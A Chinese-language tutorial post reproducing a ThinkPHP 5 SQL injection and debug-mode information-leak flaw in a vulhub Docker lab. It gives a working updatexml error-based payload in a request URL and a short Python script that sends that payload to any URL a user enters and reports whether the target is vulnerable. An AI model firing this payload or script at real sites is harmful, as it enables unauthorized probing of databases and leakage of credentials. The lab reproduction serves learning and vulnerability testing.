ThinkPHP5 SQL注入漏洞&&敏感信息泄露漏洞

1 漏洞介绍

ThinkPHP是在中国使用极为广泛的PHP开发框架。在其版本5.0(<5.1.23)中,开启debug模式,传入的某参数在绑定编译指令的时候又没有安全处理,预编译的时候导致SQL异常报错。然而thinkphp5默认开启debug模式,在漏洞环境下构造错误的SQL语法会泄漏数据库账户和密码

2 漏洞环境

复制代码
cd vulhub/thinkphp/in-sqlinjection/
部署环境
docker compose up -d
查看端口
docker compose ps

访问 ,您将看到显示用户名,表示环境正在成功运行。

http://192.168.135.132/index.php?ids[]=1&ids[]=2

3 使用payload进行复现

打开页面,你会发现消息显示成功:

http://192.168.135.132/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1

4 编写python脚本探测漏洞

复制代码
#!/usr/bin/env python
​
import requests
from urllib.parse import urljoin
​
def thinkphp5x_sql(url):
    payload = urljoin(url, '/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1')
​
    response = requests.get(url=payload, verify=False)
​
    if 'XPATH syntax error' in response.text:
        print("漏洞存在")
    else:
        print("漏洞不存在")
​
if __name__ == '__main__':
    print("注意:本代码仅用于实验和学习目的,请谨慎使用。")
    url = input("请输入目标 URL: ")
    thinkphp5x_sql(url)

结果

相关推荐
聚铭网络1 小时前
聚铭网络参编!T/CCIA 005-2026《网络安全运营大模型参考架构》正式发布
网络·web安全·架构
暮色千里.5321 小时前
多因素认证中的漏洞
网络·安全·web安全
小二·1 小时前
企业级网络安全深度解析:从协议层到云原生的攻防实战与架构设计
安全·web安全·云原生
wanhengidc1 小时前
企业如何有效利用高防服务器
运维·服务器·网络·安全·web安全·智能手机
乐6823 小时前
CISCN2026半决赛wp
python·web安全·php
花纵酒3 小时前
kali:Sqlmap专题
web安全
介一安全3 小时前
【Web安全】HTTP请求走私与CL.TE漏洞从入门到实战
web安全·网络安全·安全性测试·http请求走私
Eason_LYC3 小时前
封神!Apache OFBiz CVE-2024-45507 漏洞复现(从入门到反弹Shell,新手也能拿捏服务器)
服务器·web安全·网络安全·apache·apache ofbiz·cve-2024-45507·getshell
未知鱼17 小时前
Python安全开发之子域名扫描器(含详细注释)
网络·python·安全·web安全·网络安全
志栋智能17 小时前
超自动化巡检:应对复杂IT环境的必然选择
运维·网络·安全·web安全·自动化